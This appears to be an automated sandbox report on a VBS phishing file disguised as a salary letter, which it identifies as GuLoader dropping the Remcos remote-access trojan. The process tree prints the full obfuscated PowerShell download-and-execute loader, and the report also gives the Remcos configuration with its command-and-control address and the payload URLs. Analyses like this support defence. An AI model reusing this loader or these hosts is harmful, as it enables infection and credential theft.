Windows Analysis Report
Salary Increase Letter_Oct 2024.vbs

Overview

General Information

Sample name:Salary Increase Letter_Oct 2024.vbs
Analysis ID:1530593
MD5:35c0401fa3a0988df57e978eaa661dd2
SHA1:a07a742be842b55f4218d8c9f6f2287c21baf2db
SHA256:165cb6e17955b9dbc743f800788545b61e296119b10d22efea0cfb2f1ceb4ed5
Tags:vbs, user-abuse_ch

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • wscript.exe (PID: 6232 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. 
Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. 
stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste) {Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la ') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable ' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar ');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl 
BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio. prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je Bu)he ');Unmudded $dissimilerende;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4900 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [same obfuscated script argument as powershell.exe PID 948 above] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 3976 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6672 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5836 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2104 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3580 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1540 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
{"Host:Port:Password": "154.216.17.14:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-KC5V8F", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000004.00000002.2508157288.00000000080C0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000004.00000002.2486668247.000000000552C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_948.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

              System Summary

              Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", CommandLine|base64offset|contains: "w+y, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", ProcessId: 6232, ProcessName: wscript.exe
              Source: Network Connection, Author: frack113: Data: DestinationIp: 104.21.2.6, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3976, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49893
              Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", CommandLine|base64offset|contains: "w+y, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", ProcessId: 6232, ProcessName: wscript.exe
              Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [same obfuscated script argument as powershell.exe PID 948 in the process tree]

              Stealing of Sensitive Information

              Source: Registry Key set, Author: Joe Security: Data: Details: 8E 1F EB C8 62 04 44 BA 00 BA CC CA DB 7F D9 C1 25 1A 7F FA B6 B8 1E 38 9C 1A 30 66 20 5B 2C 3A D0 B5 2A B8 AB 7C 68 DB 3D AA AC 30 D0 05 AE 9C 21 E3 82 90 46 D0 B6 AC 39 2B 2C 94 B1 61 9E C0 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 3976, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F\exepath
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-10-10T09:28:00.605083+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49915 | 154.216.17.14 | 2404 | TCP
              2024-10-10T09:28:01.917571+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49926 | 154.216.17.14 | 2404 | TCP
              2024-10-10T09:28:01.781683+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49927 | 178.237.33.50 | 80 | TCP
              2024-10-10T09:27:56.635535+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49893 | 104.21.2.6 | 80 | TCP

              AV Detection

              Source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "154.216.17.14:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-KC5V8F", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: Salary Increase Letter_Oct 2024.vbs, Virustotal: Detection: 7%
              Source: Yara match, File source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.6% probability
              Source: Binary string: ore.pdb source: powershell.exe, 00000004.00000002.2497990268.0000000006D26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\<.oeaccountC#z source: msiexec.exe, 0000000D.00000002.2629663448.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2627803746.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2627748759.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdbq source: powershell.exe, 00000004.00000002.2497990268.0000000006D26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: msiexec.exe, 0000000D.00000002.2629463752.0000000002A4A000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_223210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_223210F1
              Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_22326580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,7_2_22326580
              Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49915 -> 154.216.17.14:2404
              Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49926 -> 154.216.17.14:2404
              Source: Malware configuration extractor, URLs: 154.216.17.14
              Source: global traffic, TCP traffic: 192.168.2.6:49915 -> 154.216.17.14:2404
              Source: global traffic, HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
              Source: Joe Sandbox View, IP Address: 178.237.33.50
              Source: Joe Sandbox View, ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49893 -> 104.21.2.6:80
              Source: Network traffic, Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49927 -> 178.237.33.50:80
              Source: global traffic, HTTP traffic detected: GET /IBodHWPw/Kokkerering.ocx HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: ln6b9.shop Connection: Keep-Alive
              Source: global traffic, HTTP traffic detected: GET /NrFLrAda/NwiqNYffVolUqcmi160.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: ln6b9.shop Cache-Control: no-cache
              Source: unknown, TCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: global traffic HTTP traffic detected: GET /IBodHWPw/Kokkerering.ocx HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: ln6b9.shop Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET /NrFLrAda/NwiqNYffVolUqcmi160.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: ln6b9.shop Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
              Source: msiexec.exe, 00000007.00000002.3472489683.00000000222F0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000A.00000002.2643859057.0000000004889000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000A.00000002.2643859057.0000000004889000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: msiexec.exe, 00000007.00000002.3473023585.0000000022760000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000007.00000002.3473023585.0000000022760000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global traffic DNS traffic detected: DNS query: ln6b9.shop
              Source: global traffic DNS traffic detected: DNS query: geoplugin.net
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp1
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpI
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpf
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gphy
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpl
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpxes
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpy2
              Source: powershell.exe, 00000002.00000002.2303486839.000001ACE71F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2303486839.000001ACE57D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2303486839.000001ACE6B15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop
              Source: powershell.exe, 00000002.00000002.2303486839.000001ACE57D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/IBodHWPw/Kokkerering.ocxP
              Source: powershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/IBodHWPw/Kokkerering.ocxXR
              Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bin
              Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bin0JdY
              Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.binK
